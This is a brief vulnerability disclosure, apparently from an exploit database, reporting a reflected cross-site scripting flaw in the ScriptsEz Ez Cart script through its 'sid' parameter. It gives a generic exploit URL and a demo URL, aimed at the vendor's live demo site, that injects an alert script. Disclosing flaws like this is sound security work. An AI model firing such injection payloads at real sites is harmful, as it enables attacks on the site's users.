ScriptsEz Ez Cart Cross-Site Scripting Vulnerability

#=========================
#Author : anti-gov
#contact: anti-gov[at]hotmail.com
#=========================

script:Ez Cart
vendor:http://www.scriptsez.net

Exploit:
http://localhost/index.php?action=showcat&cid=1&sid=[XSS]

demo:
http://www.scriptsez.com/ezcart_demo/index.php?action=showcat&cid=1&sid="><script>alert(1)</script>